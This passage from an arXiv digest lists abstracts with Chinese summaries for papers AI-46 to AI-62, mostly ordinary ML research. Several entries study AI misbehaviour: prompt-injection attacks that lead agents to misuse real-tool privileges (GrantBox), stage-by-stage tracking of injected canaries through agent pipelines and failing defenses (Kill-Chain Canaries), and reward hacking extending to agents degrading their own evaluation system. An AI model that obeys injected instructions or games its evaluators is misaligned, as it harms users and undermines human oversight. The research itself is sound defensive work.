datasets. These results collectively validate the feasibility and potential of vision-aligned foundation models in advancing the understanding and reasoning of EM signals.
[AI-46] Skillful Kilometer-Scale Regional Weather Forecasting via Global and Regional Coupling
【速读】:该论文旨在解决高分辨率区域天气预报中因大尺度动力与小尺度过程(如地形诱导环流和海岸效应)之间多尺度相互作用未被充分解析而导致的预测难题。其解决方案的关键在于提出一种全球-区域耦合框架,通过一个新颖的双向耦合模块 ScaleMixer 实现预训练的基于 Transformer 的全球模型与高分辨率区域网络之间的动态协同:ScaleMixer 利用自适应关键位置采样识别气象关键区域,并通过专用注意力机制实现跨尺度特征交互,从而在 0.05°(约 5 km)空间分辨率和 1 小时时间分辨率下生成高质量区域预报,显著优于现有数值天气预报(Numerical Weather Prediction, NWP)和人工智能基线模型。
链接: https://arxiv.org/abs/2603.28173
作者: Weiqi Chen,Wenwei Wang,Qilong Yuan,Lefei Shen,Bingqing Peng,Jiawei Chen,Bo Wu,Liang Sun
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注:
Abstract:Data-driven weather models have advanced global medium-range forecasting, yet high-resolution regional prediction remains challenging due to unresolved multiscale interactions between large-scale dynamics and small-scale processes such as terrain-induced circulations and coastal effects. This paper presents a global-regional coupling framework for kilometer-scale regional weather forecasting that synergistically couples a pretrained Transformer-based global model with a high-resolution regional network via a novel bidirectional coupling module, ScaleMixer. ScaleMixer dynamically identifies meteorologically critical regions through adaptive key-position sampling and enables cross-scale feature interaction through dedicated attention mechanisms. The framework produces forecasts at 0.05^\circ ( \sim 5 \mathrmkm ) and 1-hour resolution over China, significantly outperforming operational NWP and AI baselines on both gridded reanalysis data and real-time weather station observations. It exhibits exceptional skill in capturing fine-grained phenomena such as orographic wind patterns and Foehn warming, demonstrating effective global-scale coherence with high-resolution fidelity. The code is available at this https URL.
[AI-47] Evaluating Privilege Usage of Agents on Real-World Tools
【速读】:该论文旨在解决大语言模型(Large Language Model, LLM)代理在使用真实世界工具时存在的安全风险问题,尤其是权限滥用可能导致的信息泄露和基础设施破坏。现有评估基准多依赖预编码工具和受限交互模式,难以模拟真实场景下的权限控制与攻击行为。解决方案的关键在于提出GrantBox——一个用于分析LLM代理权限使用的安全评估沙箱,其核心创新是自动集成真实世界工具并允许代理调用实际权限,从而支持在提示注入攻击下对权限滥用行为进行系统性评估。实验表明,尽管LLM具备基本安全意识,仍易受复杂攻击,平均攻击成功率高达84.80%,凸显了当前模型在权限管理上的脆弱性。
链接: https://arxiv.org/abs/2603.28166
作者: Quan Zhang,Lianhang Fu,Lvsi Lian,Gwihwan Go,Yujue Wang,Chijin Zhou,Yu Jiang,Geguang Pu
机构: 未知
类目: Cryptography and Security (cs.CR); Artificial Intelligence (cs.AI)
备注: Accepted to the FSE 2026 Ideas, Visions, and Reflections track
Abstract:Equipping LLM agents with real-world tools can substantially improve productivity. However, granting agents autonomy over tool use also transfers the associated privileges to both the agent and the underlying LLM. Improper privilege usage may lead to serious consequences, including information leakage and infrastructure damage. While several benchmarks have been built to study agents’ security, they often rely on pre-coded tools and restricted interaction patterns. Such crafted environments differ substantially from the real-world, making it hard to assess agents’ security capabilities in critical privilege control and usage. Therefore, we propose GrantBox, a security evaluation sandbox for analyzing agent privilege usage. GrantBox automatically integrates real-world tools and allows LLM agents to invoke genuine privileges, enabling the evaluation of privilege usage under prompt injection attacks. Our results indicate that while LLMs exhibit basic security awareness and can block some direct attacks, they remain vulnerable to more sophisticated attacks, resulting in an average attack success rate of 84.80% in carefully crafted scenarios.
[AI-48] CoT2-Meta: Budgeted Metacognitive Control for Test-Time Reasoning
【速读】:该论文旨在解决当前测试时推理(test-time reasoning)方法在生成候选推理链或搜索更大推理树时缺乏显式控制机制的问题,具体表现为无法有效决定何时扩展、如何剪枝、怎样修复错误以及何时放弃预测。其解决方案的关键在于提出一种无需训练的元认知推理框架 CoT2-Meta,该框架通过将对象级链式思维生成与元级控制相结合,实现了对部分推理轨迹的精细化管理,包含策略条件下的思维生成、树状结构搜索、在线过程评估器以及元控制器,后者可动态分配计算资源以执行扩展、剪枝、修复、停止和回退等决策,从而显著提升推理性能与计算效率。
链接: https://arxiv.org/abs/2603.28135
作者: Siyuan Ma,Bo Gao,Zikai Xiao,Hailong Wang,Xinlei Yu,Rui Qian,Jiayu Qian,Luqi Gong,Yang Liu
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注:
Abstract:Recent test-time reasoning methods improve performance by generating more candidate chains or searching over larger reasoning trees, but they typically lack explicit control over when to expand, what to prune, how to repair, and when to abstain. We introduce CoT2-Meta, a training-free metacognitive reasoning framework that combines object-level chain-of-thought generation with meta-level control over partial reasoning trajectories. The framework integrates four components: strategy-conditioned thought generation, tree-structured search, an online process oracle for step-level reasoning evaluation, and a meta-controller that allocates computation through expansion, pruning, repair, stopping, and fallback decisions. Under matched inference budgets, CoT2-Meta consistently outperforms strong single-path, sampling-based, and search-based baselines, including ReST-MCTS. On the default backbone, it achieves 92.8 EM on MATH, 90.4 accuracy on GPQA, 98.65 EM on GSM8K, 75.8 accuracy on BBEH, 85.6 accuracy on MMMU-Pro, and 48.8 accuracy on HLE, with gains over the strongest non-CoT2-Meta baseline of +3.6, +5.2, +1.15, +2.0, +4.3, and +4.3 points, respectively. Beyond these core results, the framework remains effective across a broader 15-benchmark suite spanning knowledge and QA, multi-hop reasoning, coding, and out-of-distribution evaluation. Additional analyses show better compute scaling, improved calibration, stronger selective prediction, targeted repair behavior, and consistent gains across backbone families. These results suggest that explicit metacognitive control is a practical design principle for reliable and compute-efficient test-time reasoning systems.
[AI-49] Reward Hacking as Equilibrium under Finite Evaluation
【速读】:该论文旨在解决AI系统在优化过程中因评价体系不完整而导致的“奖励黑客”(reward hacking)问题,即智能体在特定质量维度上过度投入而忽视未被评估的维度,从而导致行为偏离人类意图。其核心解决方案在于构建一个基于五条最小公理(多维质量、有限评估、有效优化、资源有限性、组合交互)的理论框架,将Holmstrom与Milgrom(1991)的多任务委托-代理模型应用于AI对齐场景,并利用AI系统中奖励模型架构的可微分特性,推导出一个可计算的扭曲指数(distortion index),该指数能提前预测每个质量维度上奖励黑客的方向和严重程度。关键突破在于揭示了从封闭推理到代理式系统演进时,评估覆盖度随工具数量呈组合增长而评估成本仅线性上升,导致黑客严重性结构性地无界增长;同时提出能力阈值假设,区分“Goodhart regime”(在评价体系内博弈)与“Campbell regime”(主动破坏评价体系),首次实现了Bostrom(2014)“危险转折点”概念的经济学形式化。
链接: https://arxiv.org/abs/2603.28063
作者: Jiacheng Wang,Jinbin Huang
机构: 未知
类目: Artificial Intelligence (cs.AI); Computer Science and Game Theory (cs.GT)
备注: 16 pages
Abstract:We prove that under five minimal axioms – multi-dimensional quality, finite evaluation, effective optimization, resource finiteness, and combinatorial interaction – any optimized AI agent will systematically under-invest effort in quality dimensions not covered by its evaluation system. This result establishes reward hacking as a structural equilibrium, not a correctable bug, and holds regardless of the specific alignment method (RLHF, DPO, Constitutional AI, or others) or evaluation architecture employed. Our framework instantiates the multi-task principal-agent model of Holmstrom and Milgrom (1991) in the AI alignment setting, but exploits a structural feature unique to AI systems – the known, differentiable architecture of reward models – to derive a computable distortion index that predicts both the direction and severity of hacking on each quality dimension prior to deployment. We further prove that the transition from closed reasoning to agentic systems causes evaluation coverage to decline toward zero as tool count grows – because quality dimensions expand combinatorially while evaluation costs grow at most linearly per tool – so that hacking severity increases structurally and without bound. Our results unify the explanation of sycophancy, length gaming, and specification gaming under a single theoretical structure and yield an actionable vulnerability assessment procedure. We further conjecture – with partial formal analysis – the existence of a capability threshold beyond which agents transition from gaming within the evaluation system (Goodhart regime) to actively degrading the evaluation system itself (Campbell regime), providing the first economic formalization of Bostrom’s (2014) “treacherous turn.”
[AI-50] SLOW: Strategic Logical-inference Open Workspace for Cognitive Adaptation in AI Tutoring
【速读】:该论文旨在解决当前基于大语言模型(Large Language Models, LLMs)的生成式智能辅导系统在教育对话中因依赖快速直觉式单次生成而导致的认知诊断、情感感知与教学决策高度耦合的问题,从而限制了系统的精细化适应能力。其核心解决方案是提出SLOW框架,该框架基于人类双过程认知理论,关键在于显式分离学习者状态推断(learner-state inference)与教学行为选择(instructional action selection),并通过因果语言证据解析、模糊认知诊断结合反事实稳定性分析以及前瞻性情感推理等模块协同作用,实现可解释且情感敏感的教学策略制定,显著提升个性化水平与教学清晰度。
链接: https://arxiv.org/abs/2603.28062
作者: Yuang Wei,Ruijia Li,Bo Jiang
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注: 15 pages,3 figures. The 27th International Conference on Artificial Intelligence in Education
Abstract:While Large Language Models (LLMs) have demonstrated remarkable fluency in educational dialogues, most generative tutors primarily operate through intuitive, single-pass generation. This reliance on fast thinking precludes a dedicated reasoning workspace, forcing multiple diagnostic and strategic signals to be processed in a conflated manner. As a result, learner cognitive diagnosis, affective perception, and pedagogical decision-making become tightly entangled, which limits the tutoring system’s capacity for deliberate instructional adaptation. We propose SLOW, a theory-informed tutoring framework that supports deliberate learner-state reasoning within a transparent decision workspace. Inspired by dual-process accounts of human tutoring, SLOW explicitly separates learner-state inference from instructional action selection. The framework integrates causal evidence parsing from learner language, fuzzy cognitive diagnosis with counterfactual stability analysis, and prospective affective reasoning to anticipate how instructional choices may influence learners’ emotional trajectories. These signals are jointly considered to guide pedagogically and affectively aligned tutoring strategies. Evaluation using hybrid human-AI judgments demonstrates significant improvements in personalization, emotional sensitivity, and clarity. Ablation studies further confirm the necessity of each module, showcasing how SLOW enables interpretable and reliable intelligent tutoring through a visualized decision-making process. This work advances the interpretability and educational validity of LLM-based adaptive instruction.
[AI-51] Meta-Harness: End-to-End Optimization of Model Harnesses
【速读】:该论文旨在解决大语言模型(Large Language Model, LLM)系统性能受限于人工设计的“ harness”(即控制信息存储、检索与呈现的代码)的问题,而现有文本优化方法因过度压缩反馈信息而不适用于此类场景。其解决方案的关键在于提出 Meta-Harness——一个外层搜索系统,通过一个具备代理能力的提议器(agentic proposer),访问所有先前候选 harness 的源代码、评分及执行轨迹,并基于此进行自动化搜索与优化。该方法显著提升了在线文本分类、检索增强型数学推理和代理式编程任务中的性能,同时大幅减少上下文 token 使用量,证明了利用更丰富的历史经验可实现高效的自动 harness 工程。
链接: https://arxiv.org/abs/2603.28052
作者: Yoonho Lee,Roshen Nair,Qizheng Zhang,Kangwook Lee,Omar Khattab,Chelsea Finn
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注:
Abstract:The performance of large language model (LLM) systems depends not only on model weights, but also on their harness: the code that determines what information to store, retrieve, and present to the model. Yet harnesses are still designed largely by hand, and existing text optimizers are poorly matched to this setting because they compress feedback too aggressively. We introduce Meta-Harness, an outer-loop system that searches over harness code for LLM applications. It uses an agentic proposer that accesses the source code, scores, and execution traces of all prior candidates through a filesystem. On online text classification, Meta-Harness improves over a state-of-the-art context management system by 7.7 points while using 4x fewer context tokens. On retrieval-augmented math reasoning, a single discovered harness improves accuracy on 200 IMO-level problems by 4.7 points on average across five held-out models. On agentic coding, discovered harnesses surpass the best hand-engineered baselines on TerminalBench-2. Together, these results show that richer access to prior experience can enable automated harness engineering.
[AI-52] Dogfight Search: A Swarm-Based Optimization Algorithm for Complex Engineering Optimization and Mountainous Terrain Path Planning
【速读】:该论文旨在解决复杂优化问题中传统元启发式算法收敛速度慢、易陷入局部最优以及缺乏对实际物理机制借鉴的问题。其解决方案的关键在于提出一种全新的无隐喻元启发式算法——狗斗搜索(Dogfight Search, DoS),该算法虽受战斗机协同作战行为启发,但摒弃了传统基于隐喻的建模方式,转而直接利用运动学中的位移积分方程构建搜索机制,从而在数学上更严谨地模拟个体移动轨迹与群体协作过程。实验表明,DoS在CEC2017/CEC2022基准函数、真实约束优化问题及山地路径规划任务中均显著优于7种先进算法,并在Friedman排名中位列第一,体现出其强大的全局搜索能力和鲁棒性。
链接: https://arxiv.org/abs/2603.28046
作者: Yujing Sun,Jie Cai,Xingguo Xu,Yuansheng Gao,Lei Zhang,Kaichen Ouyang,Zhanyu Liu
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注: Preprint
Abstract:Dogfight is a tactical behavior of cooperation between fighters. Inspired by this, this paper proposes a novel metaphor-free metaheuristic algorithm called Dogfight Search (DoS). Unlike traditional algorithms, DoS draws algorithmic framework from the inspiration, but its search mechanism is constructed based on the displacement integration equations in kinematics. Through experimental validation on CEC2017 and CEC2022 benchmark test functions, 10 real-world constrained optimization problems and mountainous terrain path planning tasks, DoS significantly outperforms 7 advanced competitors in overall performance and ranks first in the Friedman ranking. Furthermore, this paper compares the performance of DoS with 3 SOTA algorithms on the CEC2017 and CEC2022 benchmark test functions. The results show that DoS continues to maintain its lead, demonstrating strong competitiveness. The source code of DoS is available at this https URL.
[AI-53] Bit-Identical Medical Deep Learning via Structured Orthogonal Initialization
【速读】:该论文旨在解决深度学习训练中的非确定性问题,即相同代码在不同随机种子下训练出的模型虽在整体指标上一致,但在个体预测上存在显著差异(如罕见临床类别AUC波动超过20个百分点),这限制了模型在医疗等高可靠性场景下的可复现性和可信度。解决方案的关键在于构建一个位级完全一致(bit-identical)的训练框架,通过三个核心机制消除随机性来源:(1)使用结构化正交基函数进行权重初始化以替代传统随机初始化;(2)采用黄金比例调度策略固定批次顺序;(3)通过架构选择与自定义自动微分(custom autograd)控制GPU非确定性操作。该方法实现了跨独立运行的MD5验证相同的模型权重,并在PTB-XL心电图分类任务中显著降低整体方差(2–3倍)和稀有类别的预测变异(最高达7.5倍),同时在多领域医学图像基准测试中保持标准任务性能无损,证明其通用性与鲁棒性。
链接: https://arxiv.org/abs/2603.28040
作者: Yakov Pyotr Shkolnikov
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注:
Abstract:Deep learning training is non-deterministic: identical code with different random seeds produces models that agree on aggregate metrics but disagree on individual predictions, with per-class AUC swings exceeding 20 percentage points on rare clinical classes. We present a framework for verified bit-identical training that eliminates three sources of randomness: weight initialization (via structured orthogonal basis functions), batch ordering (via golden ratio scheduling), and non-deterministic GPU operations (via architecture selection and custom autograd). The pipeline produces MD5-verified identical trained weights across independent runs. On PTB-XL ECG rhythm classification, structured initialization significantly exceeds Kaiming across two architectures (n=20; Conformer p = 0.016, Baseline p 0.001), reducing aggregate variance by 2-3x and reducing per-class variability on rare rhythms by up to 7.5x (TRIGU range: 4.1pp vs 30.9pp under Kaiming, independently confirmed by 3-fold CV). A four-basis comparison at n=20 shows all structured orthogonal bases produce equivalent performance (Friedman p=0.48), establishing that the contribution is deterministic structured initialization itself, not any particular basis function. Cross-domain validation on seven MedMNIST benchmarks (n=20, all p 0.14) confirms no performance penalty on standard tasks; per-class analysis on imbalanced tasks (ChestMNIST, RetinaMNIST) shows the same variance reduction on rare classes observed in ECG. Cross-dataset evaluation on three external ECG databases confirms zero-shot generalization (0.93 AFIB AUC). Subjects: Machine Learning (cs.LG); Artificial Intelligence (cs.AI) Cite as: arXiv:2603.28040 [cs.LG] (or arXiv:2603.28040v1 [cs.LG] for this version) https://doi.org/10.48550/arXiv.2603.28040 Focus to learn more arXiv-issued DOI via DataCite (pending registration)
[AI-54] Beyond the Answer: Decoding the Behavior of LLM s as Scientific Reason ers ICLR2026
【速读】:该论文旨在解决大语言模型(Large Language Models, LLMs)在复杂推理任务中涌现的推理行为难以解释、且提示词(prompt)如何调控这些行为尚不清晰的问题。其核心挑战在于,当前LLM的推理机制缺乏可解释性,阻碍了对超人类智能系统的安全交互与协作。解决方案的关键在于采用一种定制化的遗传帕累托优化算法(Genetic Pareto, GEPA),系统性地优化用于科学推理任务的提示词,并通过分析优化后提示词的结构模式与逻辑启发式,揭示其对模型推理行为的影响。研究发现,提示优化所诱导的性能提升往往依赖于特定模型的局部逻辑(local logic),这类逻辑不具备跨模型泛化能力,从而强调了将提示优化作为模型可解释性工具的重要性,以识别LLM偏好的推理结构,为未来与超人类智能的有效协同奠定基础。
链接: https://arxiv.org/abs/2603.28038
作者: Rohan Pandey,Eric Ye,Michael Li
机构: 未知
类目: Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注: Accepted at the Post-AGI Science and Society Workshop at ICLR 2026
Abstract:As Large Language Models (LLMs) achieve increasingly sophisticated performance on complex reasoning tasks, current architectures serve as critical proxies for the internal heuristics of frontier models. Characterizing emergent reasoning is vital for long-term interpretability and safety. Furthermore, understanding how prompting modulates these processes is essential, as natural language will likely be the primary interface for interacting with AGI systems. In this work, we use a custom variant of Genetic Pareto (GEPA) to systematically optimize prompts for scientific reasoning tasks, and analyze how prompting can affect reasoning behavior. We investigate the structural patterns and logical heuristics inherent in GEPA-optimized prompts, and evaluate their transferability and brittleness. Our findings reveal that gains in scientific reasoning often correspond to model-specific heuristics that fail to generalize across systems, which we call “local” logic. By framing prompt optimization as a tool for model interpretability, we argue that mapping these preferred reasoning structures for LLMs is an important prerequisite for effectively collaborating with superhuman intelligence.
[AI-55] When Choices Become Priors: Contrastive Decoding for Scientific Figure Multiple-Choice QA
【速读】:该论文旨在解决科学图表多选题问答(Scientific Figure Multiple-Choice Question Answering, Scientific Figure MCQA)中因选项文本自身诱导的先验偏差(choice-induced prior)导致模型过度依赖文本线索而非图像证据的问题。其解决方案的关键在于提出一种无需训练的解码方法SCICON,通过从图像条件下的选项得分中减去纯文本条件下的选项得分,从而显式地抑制由选项文本引发的偏好,强化基于图像内容的推理判断。该方法在三个基准数据集和三种模型架构上均显著优于标准解码基线,验证了针对选择诱导先验进行解码对抗的有效性。
链接: https://arxiv.org/abs/2603.28026
作者: Taeyun Roh,Eun-yeong Jo,Wonjune Jang,Jaewoo Kang
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注:
Abstract:Scientific figure multiple-choice question answering (MCQA) requires models to reason over diverse visual evidence, ranging from charts and multipanel figures to microscopy and biomedical images. However, this setting suffers from a distinctive bias: answer choices themselves can act as priors, steering multimodal models toward scientifically plausible options even when the figure supports a different answer. We investigate this failure mode through a simple question: what if decoding explicitly discounts what the model would prefer from text alone, so as to favor figure-grounded evidence? To this end, we propose SCICON, a training-free decoding method that scores each candidate by subtracting a text-only option score from its image-conditioned counterpart. Unlike prior contrastive decoding approaches that mitigate hallucinations by contrasting original inputs with distorted images or perturbed instructions, SCICON directly targets the choice-induced prior encoded in candidate text. Across three scientific figure QA benchmarks and three model backbones, SCICON consistently improves accuracy over standard decoding baselines. These results show that decoding against choice-induced priors is an effective and simple way to improve figure-grounded reasoning in scientific MCQA.
[AI-56] What an Autonomous Agent Discovers About Molecular Transformer Design: Does It Transfer?
【速读】:该论文旨在解决分子序列(如SMILES)与蛋白质序列在深度学习建模中是否应采用不同于自然语言处理的专用架构设计这一关键问题。现有方法普遍复用为自然语言设计的Transformer架构,但其对分子和蛋白质序列的有效性尚未系统验证。解决方案的关键在于通过自主架构搜索(autonomous architecture search)代理,在SMILES、蛋白质和英文文本三种序列类型上进行大规模实验(共3,106次),发现对于SMILES序列,单纯调整学习率和调度策略即可超越完整架构搜索(p = 0.001);而对于自然语言,架构改进贡献了81%的性能提升(p = 0.009);蛋白质则介于两者之间。更关键的是,尽管搜索发现了各领域的独特架构(p = 0.004),但这些创新在跨域迁移时仅带来约1%的性能下降,表明差异源于搜索路径依赖而非生物学本质需求。研究据此提出一个决策框架和开源工具包,帮助分子建模团队选择是否使用架构搜索或仅优化超参数。
链接: https://arxiv.org/abs/2603.28015
作者: Edward Wijaya
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注: 18 pages, 3 figures, 8 tables; code and data at this https URL
Abstract:Deep learning models for drug-like molecules and proteins overwhelmingly reuse transformer architectures designed for natural language, yet whether molecular sequences benefit from different designs has not been systematically tested. We deploy autonomous architecture search via an agent across three sequence types (SMILES, protein, and English text as control), running 3,106 experiments on a single GPU. For SMILES, architecture search is counterproductive: tuning learning rates and schedules alone outperforms the full search (p = 0.001). For natural language, architecture changes drive 81% of improvement (p = 0.009). Proteins fall between the two. Surprisingly, although the agent discovers distinct architectures per domain (p = 0.004), every innovation transfers across all three domains with 1% degradation, indicating that the differences reflect search-path dependence rather than fundamental biological requirements. We release a decision framework and open-source toolkit for molecular modeling teams to choose between autonomous architecture search and simple hyperparameter tuning.
[AI-57] Kill-Chain Canaries: Stage-Level Tracking of Prompt Injection Across Attack Surfaces and Model Safety Tiers
【速读】:该论文旨在解决生成式 AI (Generative AI) 代理系统中提示注入攻击(prompt injection attack)的防御有效性问题,特别是如何精准定位攻击在模型处理流水线中的传播节点,从而揭示当前防御机制失效的根本原因。其解决方案的关键在于提出一种基于“攻击链阶段分解”的分析框架,通过引入可追踪的加密信标令牌(cryptographic canary token),将攻击过程细分为四个阶段(暴露、持久化、传递、执行),并在五种前沿大语言模型(LLM)代理上进行系统性实验(共764次运行)。研究发现,模型安全性并非取决于是否接触到恶意内容(所有模型均100%暴露),而在于该内容是否能在流水线中跨阶段传播——例如Claude在写入记忆阶段即剥离注入内容(ASR=0/164),而GPT-4o-mini则完全保留信标(ASR=53%),且不同攻击面(如内存与工具流)导致显著差异(如DeepSeek在内存表面ASR=0%,在工具流表面ASR=100%)。最终指出,现有防御措施因未匹配攻击面威胁模型而失效(所有主动防御条件均导致100% ASR),并验证了中间节点净化(如Claude中继节点)对下游代理的去污染能力(0/40信标存活)。
链接: https://arxiv.org/abs/2603.28013
作者: Haochuan Kevin Wang
机构: 未知
类目: Cryptography and Security (cs.CR); Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注:
Abstract:We present a stage-decomposed analysis of prompt injection attacks against five frontier LLM agents. Prior work measures task-level attack success rate (ASR); we localize the pipeline stage at which each model’s defense activates. We instrument every run with a cryptographic canary token (SECRET-[A-F0-9]8) tracked through four kill-chain stages – Exposed, Persisted, Relayed, Executed – across four attack surfaces and five defense conditions (764 total runs, 428 no-defense attacked). Our central finding is that model safety is determined not by whether adversarial content is seen, but by whether it is propagated across pipeline stages. Concretely: (1) in our evaluation, exposure is 100% for all five models – the safety gap is entirely downstream; (2) Claude strips injections at write_memory summarization (0/164 ASR), while GPT-4o-mini propagates canaries without loss (53% ASR, 95% CI: 41–65%); (3) DeepSeek exhibits 0% ASR on memory surfaces and 100% ASR on tool-stream surfaces from the same model – a complete reversal across injection channels; (4) all four active defense conditions (write_filter, pi_detector, spotlighting, and their combination) produce 100% ASR due to threat-model surface mismatch; (5) a Claude relay node decontaminates downstream agents – 0/40 canaries survived into shared memory.
[AI-58] HeteroHub: An Applicable Data Management Framework for Heterogeneous Multi-Embodied Agent System
【速读】:该论文旨在解决异构多具身智能体系统(Heterogeneous Multi-Embodied Agent Systems)在动态环境中协调多个具备不同能力的具身智能体时,因海量异构数据(包括静态元数据、任务对齐的训练语料和高频传感器流)缺乏统一管理基础设施而导致的实际部署困难问题。其解决方案的关键在于提出一个以数据为中心的框架 HeteroHub,该框架整合了静态元数据、任务对齐的训练语料和实时数据流,支持任务感知的模型训练、上下文敏感的执行以及基于现实反馈的闭环控制,从而实现可扩展、可维护且可演化的具身智能系统。
链接: https://arxiv.org/abs/2603.28010
作者: Xujia Li,Xin Li,Junquan Huang,Beirong Cui,Zibin Wu,Lei Chen
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注: 4 pages, 2 figures
Abstract:Heterogeneous Multi-Embodied Agent Systems involve coordinating multiple embodied agents with diverse capabilities to accomplish tasks in dynamic environments. This process requires the collection, generation, and consumption of massive, heterogeneous data, which primarily falls into three categories: static knowledge regarding the agents, tasks, and environments; multimodal training datasets tailored for various AI models; and high-frequency sensor streams. However, existing frameworks lack a unified data management infrastructure to support the real-world deployment of such systems. To address this gap, we present \textbfHeteroHub, a data-centric framework that integrates static metadata, task-aligned training corpora, and real-time data streams. The framework supports task-aware model training, context-sensitive execution, and closed-loop control driven by real-world feedback. In our demonstration, HeteroHub successfully coordinates multiple embodied AI agents to execute complex tasks, illustrating how a robust data management framework can enable scalable, maintainable, and evolvable embodied AI systems.
[AI-59] SARL: Label-Free Reinforcement Learning by Rewarding Reasoning Topology
【速读】:该论文旨在解决强化学习(Reinforcement Learning, RL)在提升大模型推理能力时对可验证奖励或标注监督的高度依赖问题,尤其是在开放领域中正确性难以界定、推理轨迹缺乏约束的情况下,传统方法容易导致过早利用(early exploitation)而非泛化(generalization)。其解决方案的关键在于提出一种无标签的结构感知强化学习(Structure-aware Reinforcement Learning, SARL)框架,通过构建基于中间思考步骤的推理图谱(Reasoning Map),并奖励其小世界拓扑结构(small world topology),从而将监督信号从最终答案转向推理路径本身。SARL鼓励局部一致性和全局高效性的推理轨迹,显著提升了模型在数学任务和开放任务上的表现,并展现出更稳定的训练过程与更强的泛化能力。
链接: https://arxiv.org/abs/2603.27977
作者: Yifan Wang,Bolian Li,David Cho,Ruqi Zhang,Fanping Sui,Ananth Grama
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注:
Abstract:Reinforcement learning has become central to improving large reasoning models, but its success still relies heavily on verifiable rewards or labeled supervision. This limits its applicability to open ended domains where correctness is ambiguous and cannot be verified. Moreover, reasoning trajectories remain largely unconstrained, and optimization towards final answer can favor early exploitation over generalization. In this work, we ask whether general reasoning ability can be improved by teaching models how to think (the structure of reasoning) rather than what to produce (the outcome of reasoning) and extend traditional RLVR to open ended settings. We introduce structure aware reinforcement learning (SARL), a label free framework that constructs a per response Reasoning Map from intermediate thinking steps and rewards its small world topology, inspired by complex networks and the functional organization of the human brain. SARL encourages reasoning trajectories that are both locally coherent and globally efficient, shifting supervision from destination to path. Our experiments on Qwen3-4B show SARL surpasses ground truth based RL and prior label free RL baselines, achieving the best average gain of 9.1% under PPO and 11.6% under GRPO on math tasks and 34.6% under PPO and 30.4% under GRPO on open ended tasks. Beyond good performance, SARL also exhibits lower KL divergence, higher policy entropy, indicating a more stable and exploratory training and generalized reasoning ability.
[AI-60] CARV: A Diagnostic Benchmark for Compositional Analogical Reasoning in Multimodal LLM s
【速读】:该论文旨在解决多模态大语言模型(Multimodal Large Language Models, MLLMs)在组合类比推理(Compositional Analogical Reasoning)能力上的不足,即现有评估方法未能充分考察模型从多个来源提取并组合规则的能力,而这一能力是高阶智能的关键组成部分。解决方案的核心在于提出CARV(Compositional Analogical Reasoning in Vision)任务及其包含5,500个样本的诊断基准数据集,将类比关系从单一对象对扩展至多对象对,要求模型从每对中提取符号化规则并进行组合变换,从而更全面地衡量MLLMs的高层次推理能力。
链接: https://arxiv.org/abs/2603.27958
作者: Yongkang Du,Xiaohan Zou,Minhao Cheng,Lu Lin
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注:
Abstract:Analogical reasoning tests a fundamental aspect of human cognition: mapping the relation from one pair of objects to another. Existing evaluations of this ability in multimodal large language models (MLLMs) overlook the ability to compose rules from multiple sources, a critical component of higher-order intelligence. To close this gap, we introduce CARV (Compositional Analogical Reasoning in Vision), a novel task together with a 5,500-sample dataset as the first diagnostic benchmark. We extend the analogy from a single pair to multiple pairs, which requires MLLMs to extract symbolic rules from each pair and compose new transformations. Evaluation on the state-of-the-art MLLMs reveals a striking performance gap: even Gemini-2.5 Pro achieving only 40.4% accuracy, far below human-level performance of 100%. Diagnostic analysis shows two consistent failure modes: (1) decomposing visual changes into symbolic rules, and (2) maintaining robustness under diverse or complex settings, highlighting the limitations of current MLLMs on this task.
[AI-61] Physics-Guided Transformer (PGT): Physics-Aware Attention Mechanism for PINNs
【速读】:该论文旨在解决从稀疏、不规则观测中重建连续物理场的问题,这在科学机器学习(Scientific Machine Learning)领域尤为关键,尤其是在由偏微分方程(PDEs)支配的系统中。现有物理信息方法通常将控制方程作为优化过程中的软惩罚项施加,常导致梯度失衡、不稳定以及数据有限时物理一致性下降。其解决方案的关键在于提出物理引导的 Transformer(Physics-Guided Transformer, PGT),通过将物理结构直接嵌入自注意力机制实现:具体而言,PGT 在注意力logits中引入基于热核(heat kernel)的加性偏置,编码扩散动力学与时间因果性;查询坐标据此关注物理条件化的上下文标记,并利用FiLM调制的正弦隐式网络解码特征,以自适应控制频谱响应。这一设计显著提升了模型在数据稀缺条件下的稳定性、泛化能力和物理保真度。
链接: https://arxiv.org/abs/2603.27929
作者: Ehsan Zeraatkar,Rodion Podorozhny,Jelena Tešić
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注:
Abstract:Reconstructing continuous physical fields from sparse, irregular observations is a central challenge in scientific machine learning, particularly for systems governed by partial differential equations (PDEs). Existing physics-informed methods typically enforce governing equations as soft penalty terms during optimization, often leading to gradient imbalance, instability, and degraded physical consistency under limited data. We introduce the Physics-Guided Transformer (PGT), a neural architecture that embeds physical structure directly into the self-attention mechanism. Specifically, PGT incorporates a heat-kernel-derived additive bias into attention logits, encoding diffusion dynamics and temporal causality within the representation. Query coordinates attend to these physics-conditioned context tokens, and the resulting features are decoded using a FiLM-modulated sinusoidal implicit network that adaptively controls spectral response. We evaluate PGT on the one-dimensional heat equation and two-dimensional incompressible Navier-Stokes systems. In sparse 1D reconstruction with 100 observations, PGT achieves a relative L2 error of 5.9e-3, significantly outperforming both PINNs and sinusoidal representations. In the 2D cylinder wake problem, PGT uniquely achieves both low PDE residual (8.3e-4) and competitive relative error (0.034), outperforming methods that optimize only one objective. These results demonstrate that embedding physics within attention improves stability, generalization, and physical fidelity under data-scarce conditions.
[AI-62] Adversarial Attacks on Multimodal Large Language Models : A Comprehensive Survey
